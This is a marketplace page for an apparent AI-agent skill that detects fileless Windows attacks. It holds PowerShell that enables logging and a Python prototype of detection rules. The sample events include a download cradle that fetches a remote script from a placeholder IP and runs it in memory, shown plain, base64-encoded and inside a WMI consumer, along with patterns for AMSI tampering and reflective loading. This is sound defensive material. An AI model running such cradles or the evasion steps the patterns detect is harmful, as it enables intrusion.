detecting-fileless-attacks-on-endpoints

Featured

Detects fileless malware and in-memory attacks that execute entirely in RAM without writing persistent files to disk, evading traditional antivirus. Use when building detections for PowerShell-based attacks, reflective DLL injection, WMI persistence, and registry-resident malware. Activates for requests involving fileless malware detection, in-memory attacks, PowerShell exploitation, or living-off-the-land techniques.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0


Quality Score: 99/100

| Criterion | Weight | Score |
|---|---|---|
| Stars | 20% | 100 |
| Recency | 20% | 100 |
| Frontmatter | 20% | 70 |
| Documentation | 15% | 100 |
| Issue Health | 10% | 50 |
| License | 10% | 100 |
| Description | 5% | 100 |

Skill Content

# Detecting Fileless Attacks on Endpoints

## When to Use

Use this skill when:

- Building detection rules for fileless malware that operates entirely in memory
- Hunting for PowerShell-based attacks, reflective DLL injection, and WMI abuse
- Configuring endpoint telemetry (Sysmon, AMSI, PowerShell logging) to capture fileless indicators
- Investigating incidents where traditional AV found no malicious files

**Do not use** for detecting file-based malware or for malware reverse engineering.

## Prerequisites

- Sysmon with process creation (Event ID 1) and WMI event logging (Event IDs 19, 20 and 21 for WMI filter, consumer and binding activity) enabled
- PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) enabled, both written to the Microsoft-Windows-PowerShell/Operational log
- AMSI (Antimalware Scan Interface) enabled for script content inspection
- EDR with behavioral detection capabilities (MDE, CrowdStrike, SentinelOne)

## Workflow

### Step 1: Enable Required Telemetry

```powershell
$psPolicy = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell"

# Enable PowerShell Script Block Logging (GPO or registry).
# The policy keys do not exist by default; create them first or New-ItemProperty fails.
New-Item -Path "$psPolicy\ScriptBlockLogging" -Force | Out-Null
New-ItemProperty -Path "$psPolicy\ScriptBlockLogging" `
    -Name EnableScriptBlockLogging -Value 1 -PropertyType DWORD -Force

# Enable PowerShell Module Logging. Nothing is logged unless the modules to log
# are listed under ModuleNames, so add the wildcard entry to cover every module.
New-Item -Path "$psPolicy\ModuleLogging\ModuleNames" -Force | Out-Null
New-ItemProperty -Path "$psPolicy\ModuleLogging" `
    -Name EnableModuleLogging -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path "$psPolicy\ModuleLogging\ModuleNames" `
    -Name "*" -Value "*" -PropertyType String -Force

# Enable PowerShell Transcription. Without OutputDirectory, transcripts land in each
# user's Documents folder, where the attacker running the shell can read or delete them.
New-Item -Path "$psPolicy\Transcription" -Force | Out-Null
New-ItemProperty -Path "$psPolicy\Transcription" `
    -Name EnableTranscripting -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path "$psPolicy\Transcription" `
    -Name OutputDirectory -Value "C:\PSTranscripts" -PropertyType String -Force  # example path; prefer a write-only share

# Sysmon config for fileless ...
```
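The telemetry enabled above only pays off once detection logic runs over it. The following Python prototype is an added example and is not part of the skill or the repository it comes from: it applies a small set of fileless-indicator rules to constructed endpoint events shaped like Sysmon Event IDs 1, 13 and 20 and PowerShell Event ID 4104 (the field names mirror those event types, but the records, the TEST-NET address 203.0.113.5, the SID and the registry paths are made up for the example). It decodes `-EncodedCommand` payloads before scanning them, correlates a registry read with an in-memory execution sink, and flags a WMI CommandLineEventConsumer, mapping each hit to the ATT&CK technique it indicates. The rule names, thresholds and the `Event`/`Finding` types are assumptions for the example, not an EDR or SIEM API.

```python
"""Prototype fileless-attack detection over constructed endpoint events (added example)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    source: str      # "sysmon" or "powershell" (assumed normalised source tag)
    event_id: int    # Sysmon EID 1/13/20, PowerShell EID 4104
    fields: dict


@dataclass
class Finding:
    technique: str   # MITRE ATT&CK technique ID
    description: str
    event: Event


# Content rules applied to script text: 4104 script blocks, decoded -enc payloads, command lines.
SCRIPT_RULES = [
    ("T1620", "reflective .NET assembly load",
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
    ("T1620", "unmanaged memory API called from script (injection primitive)",
     re.compile(r"\b(?:VirtualAlloc|WriteProcessMemory|CreateRemoteThread)\b", re.I)),
    ("T1059.001", "download cradle (web fetch fed into IEX)",
     re.compile(r"(?:IEX|Invoke-Expression)[\s\S]*?(?:DownloadString|DownloadData|Invoke-WebRequest|\biwr\b)"
                r"|(?:DownloadString|DownloadData|Invoke-WebRequest|\biwr\b)[\s\S]*?(?:IEX|Invoke-Expression)", re.I)),
    ("T1562.001", "AMSI tampering", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
]
REG_READ = re.compile(r"\bGet-ItemProperty\b|\[Microsoft\.Win32\.Registry\]::", re.I)
EXEC_SINK = re.compile(r"\bIEX\b|Invoke-Expression|::Load\(|FromBase64String", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{512,}={0,2}$")   # assumed size threshold for a stored payload
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def scan_script(text, ev):
    """Apply the content rules to one piece of script text."""
    findings = [Finding(t, d, ev) for t, d, rx in SCRIPT_RULES if rx.search(text)]
    if REG_READ.search(text) and EXEC_SINK.search(text):   # registry-resident payload pattern
        findings.append(Finding("T1027.011", "registry value read and executed in memory", ev))
    return findings


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyze_process(ev):           # Sysmon EID 1
    f = ev.fields
    image, parent, cmd = _basename(f.get("Image", "")), _basename(f.get("ParentImage", "")), f.get("CommandLine", "")
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    findings = []
    if parent in OFFICE_PARENTS:
        findings.append(Finding("T1059.001", f"PowerShell spawned by {parent}", ev))
    if re.search(r"-(?:nop|noprofile)\b", cmd, re.I) and re.search(r"-(?:w|win|window|windowstyle)\s+hidden", cmd, re.I):
        findings.append(Finding("T1564.003", "hidden window with profile suppressed", ev))
    findings += scan_script(cmd, ev)
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(Finding("T1027.010", "base64-encoded command line", ev))
        findings += scan_script(decoded, ev)    # inspect what the encoding hides
    return findings


def analyze_wmi_consumer(ev):      # Sysmon EID 20
    f = ev.fields
    if f.get("Type") != "Command Line":
        return []
    return [Finding("T1546.003", f"CommandLineEventConsumer {f.get('Name')!r}", ev)] + scan_script(f.get("Destination", ""), ev)


def analyze_registry(ev):          # Sysmon EID 13
    details = ev.fields.get("Details", "")
    if B64_BLOB.match(details):
        return [Finding("T1027.011", f"large base64 blob written to {ev.fields.get('TargetObject')}", ev)]
    return []


HANDLERS = {
    ("sysmon", 1): analyze_process,
    ("sysmon", 13): analyze_registry,
    ("sysmon", 20): analyze_wmi_consumer,
    ("powershell", 4104): lambda ev: scan_script(ev.fields.get("ScriptBlockText", ""), ev),
}


def detect(events):
    return [fd for ev in events for fd in HANDLERS.get((ev.source, ev.event_id), lambda _: [])(ev)]


def techniques(findings):
    return sorted({fd.technique for fd in findings})


# Constructed sample telemetry (not real captures); 203.0.113.5 is a documentation address.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("sysmon", 1, {"Image": PS_EXE, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                        "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"}),
    Event("powershell", 4104, {"ScriptBlockText":
          "$b=[Convert]::FromBase64String((Get-ItemProperty HKCU:\\Software\\Classes\\x).p);"
          "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"}),
    Event("sysmon", 20, {"Name": "Updater", "Type": "Command Line",
                         "Destination": f'powershell.exe -nop -w hidden -c "{SAMPLE_CRADLE}"'}),
    Event("sysmon", 13, {"TargetObject": r"HKU\S-1-5-21-1004\Software\Classes\x\p",
                         "Details": base64.b64encode(bytes(range(256)) * 4).decode()}),
    Event("sysmon", 1, {"Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
                        "CommandLine": "powershell.exe Get-Process"}),   # benign control, produces no finding
]

if __name__ == "__main__":
    for fd in detect(SAMPLE_EVENTS):
        print(f"{fd.technique:<10} {fd.event.source}/{fd.event.event_id}: {fd.description}")
```

Two design points matter more than the individual regexes. First, scanning happens on the decoded payload as well as the raw command line, because every content rule misses when the script only ever appears base64-encoded in Event ID 1; Script Block Logging closes the same gap for the 4104 path, since it records the de-obfuscated block. Second, the registry-resident rule requires both a registry read and an execution sink in the same block, which keeps ordinary `Get-ItemProperty` administration from firing; the single-pattern rules are noisier and belong behind a scoring or suppression layer in a real deployment.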

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

detecting-fileless-malware-techniques

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-evasion-techniques-in-endpoint-logs

Detects defense evasion techniques used by adversaries in endpoint logs including log tampering, timestomping, process injection, and security tool disabling. Use when investigating suspicious endpoint behavior, building detection rules for evasion tactics, or conducting threat hunting for stealthy adversary activity. Activates for requests involving evasion detection, defense evasion analysis, log tampering detection, or MITRE ATT&CK TA0005.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-suspicious-powershell-execution

Detect suspicious PowerShell execution patterns including encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasion.

12,642 Updated today
mukul975
AI & Automation Featured

performing-lateral-movement-detection

Detects lateral movement techniques including Pass-the-Hash, PsExec, WMI execution, RDP pivoting, and SMB-based spreading using SIEM correlation of Windows event logs, network flow data, and endpoint telemetry mapped to MITRE ATT&CK Lateral Movement (TA0008) techniques.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-living-off-the-land-attacks

Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.

12,642 Updated today
mukul975